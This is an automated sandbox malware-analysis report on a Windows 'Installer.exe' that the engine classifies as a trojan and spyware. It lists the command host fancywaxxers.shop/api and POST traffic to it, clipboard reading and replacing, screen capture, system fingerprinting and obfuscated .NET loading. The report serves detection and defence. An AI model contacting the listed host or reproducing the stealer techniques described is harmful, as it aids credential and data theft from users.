HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop

Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: Installer.exe, 00000002.00000002.2898331175.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000002.00000002.2897864942.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/
Source: Installer.exe, 00000002.00000002.2897930299.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000002.00000002.2897953740.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api
Source: Installer.exe, 00000002.00000002.2897953740.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apih
Source: Installer.exe, 00000002.00000002.2897953740.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/e

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49743 version: TLS 1.2

Source: C:\Users\user\Desktop\Installer.exe

Code function: 2_2_00438A00 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00438A00

Source: C:\Users\user\Desktop\Installer.exe

Code function: 2_2_03301000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

2_2_03301000

Source: C:\Users\user\Desktop\Installer.exe

Code function: 2_2_00438A00 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00438A00

Source: C:\Users\user\Desktop\Installer.exe

Code function: 2_2_00438BA0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_00438BA0

Source: C:\Users\user\Desktop\Installer.exe	Code function: 0_2_010B0861	0_2_010B0861
Source: C:\Users\user\Desktop\Installer.exe	Code function: 0_2_010B0870	0_2_010B0870
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0041616F	2_2_0041616F
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00426970	2_2_00426970
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0040E9C9	2_2_0040E9C9
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0043DA40	2_2_0043DA40
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00422A9B	2_2_00422A9B
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00412BE0	2_2_00412BE0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00423410	2_2_00423410
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0043DCC0	2_2_0043DCC0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_004454A0	2_2_004454A0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0040AE20	2_2_0040AE20
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00445E20	2_2_00445E20
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00429F30	2_2_00429F30
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0040D7E3	2_2_0040D7E3
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0041B840	2_2_0041B840
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0043F040	2_2_0043F040
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00406860	2_2_00406860
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00444870	2_2_00444870
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0042C006	2_2_0042C006
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00420818	2_2_00420818
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00412030	2_2_00412030
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_004150C0	2_2_004150C0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0041A8F0	2_2_0041A8F0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_004378FB	2_2_004378FB
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00445880	2_2_00445880
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00436090	2_2_00436090
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00428898	2_2_00428898
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0041C8BF	2_2_0041C8BF
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00444960	2_2_00444960
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00444979	2_2_00444979
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0044497B	2_2_0044497B
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00427100	2_2_00427100
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00432131	2_2_00432131
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_004039C0	2_2_004039C0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0043D1D0	2_2_0043D1D0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00426191	2_2_00426191
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_004099A0	2_2_004099A0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0041E200	2_2_0041E200
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00437209	2_2_00437209
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0041821B	2_2_0041821B
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00445220	2_2_00445220
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00444AC0	2_2_00444AC0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0043EAD0	2_2_0043EAD0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00419F95	2_2_00419F95
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0043C2DE	2_2_0043C2DE
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0043F2A0	2_2_0043F2A0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00417B48	2_2_00417B48
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00445B60	2_2_00445B60
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00405B70	2_2_00405B70
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00404370	2_2_00404370
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00417306	2_2_00417306
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0043BB2E	2_2_0043BB2E
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0040BB3C	2_2_0040BB3C
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0043533C	2_2_0043533C
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_004063D0	2_2_004063D0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_004223E6	2_2_004223E6
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00402BA0	2_2_00402BA0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0040B3A0	2_2_0040B3A0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00415BA0	2_2_00415BA0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0043B44E	2_2_0043B44E
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0041CC70	2_2_0041CC70
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00436400	2_2_00436400
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00432413	2_2_00432413
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00444C10	2_2_00444C10
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0043D430	2_2_0043D430
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0041B4F0	2_2_0041B4F0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_004424F7	2_2_004424F7
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_004094A0	2_2_004094A0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00433CB6	2_2_00433CB6
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0041D510	2_2_0041D510
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_004385C0	2_2_004385C0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_004105CB	2_2_004105CB
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00407640	2_2_00407640
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00429670	2_2_00429670
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0041E610	2_2_0041E610
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0042A630	2_2_0042A630
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00427EF4	2_2_00427EF4
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00404E90	2_2_00404E90
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0041DEA0	2_2_0041DEA0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00441F40	2_2_00441F40
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00432F50	2_2_00432F50
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0042FF00	2_2_0042FF00
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0042B706	2_2_0042B706
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0042AF1D	2_2_0042AF1D
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00420F8A	2_2_00420F8A
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00419F95	2_2_00419F95
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_00402FA0	2_2_00402FA0
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_004417B0	2_2_004417B0

Source: C:\Users\user\Desktop\Installer.exe	Code function: String function: 004150B0 appears 121 times
Source: C:\Users\user\Desktop\Installer.exe	Code function: String function: 004081D0 appears 46 times

Source: C:\Users\user\Desktop\Installer.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 164

Source: Installer.exe, 00000000.00000002.2070759353.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameclr.dllT vs Installer.exe

Source: Installer.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: Installer.exe

Static PE information: Section: .bss ZLIB complexity 1.000333021313364

Source: Installer.exe, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Installer.exe, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Installer.exe.3d69550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Installer.exe.3d69550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/5@1/1

Source: C:\Users\user\Desktop\Installer.exe

Code function: 2_2_0043DCC0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_0043DCC0

Source: C:\Users\user\Desktop\Installer.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7412

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\5ce467c0-8cb3-4e4b-ade4-7df3eb514170

Jump to behavior

Source: Installer.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Installer.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Installer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Installer.exe

ReversingLabs: Detection: 28%

Source: Installer.exe

String found in binary or memory: file:///C:/Users/user/Desktop/Installer.exe

Source: C:\Users\user\Desktop\Installer.exe

File read: C:\Users\user\Desktop\Installer.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 164
Source: C:\Users\user\Desktop\Installer.exe	Process created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Installer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Installer.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Installer.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Installer.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Windows.Forms.pdb source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: System.pdb) source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: Handler.pdb source: Installer.exe, WERD47F.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WERD47F.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERD47F.tmp.dmp.5.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: Installer.exe, OqnvDGyNnPPvG6T46X.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.Installer.exe.3d69550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: Installer.exe

Static PE information: 0xB22C430A [Sun Sep 21 17:53:14 2064 UTC]

Source: C:\Users\user\Desktop\Installer.exe	Code function: 0_2_010B0E30 push esp; retf	0_2_010B0E31
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0044DB02 push esi; ret	2_2_0044DB28
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0044DB2E push esi; ret	2_2_0044DB28
Source: C:\Users\user\Desktop\Installer.exe	Code function: 2_2_0044DD05 push cs; ret	2_2_0044DD06

Source: Installer.exe, OqnvDGyNnPPvG6T46X.cs	High entropy of concatenated method names: 'Qerauq6FF2', 'nW4lBacjpc', 'NBbmObeVEM', 'bqpm7jSIZK', 'sREmHxnXei', 'uu3mAcrNh4', 'n0OmcKY1xJ', 'A1VRDsBnZ', 'oqBlqdN3O', 'pRhoMmNSX'
Source: 0.2.Installer.exe.3d69550.0.raw.unpack, OqnvDGyNnPPvG6T46X.cs	High entropy of concatenated method names: 'Qerauq6FF2', 'nW4lBacjpc', 'NBbmObeVEM', 'bqpm7jSIZK', 'sREmHxnXei', 'uu3mAcrNh4', 'n0OmcKY1xJ', 'A1VRDsBnZ', 'oqBlqdN3O', 'pRhoMmNSX'

Source: C:\Users\user\Desktop\Installer.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
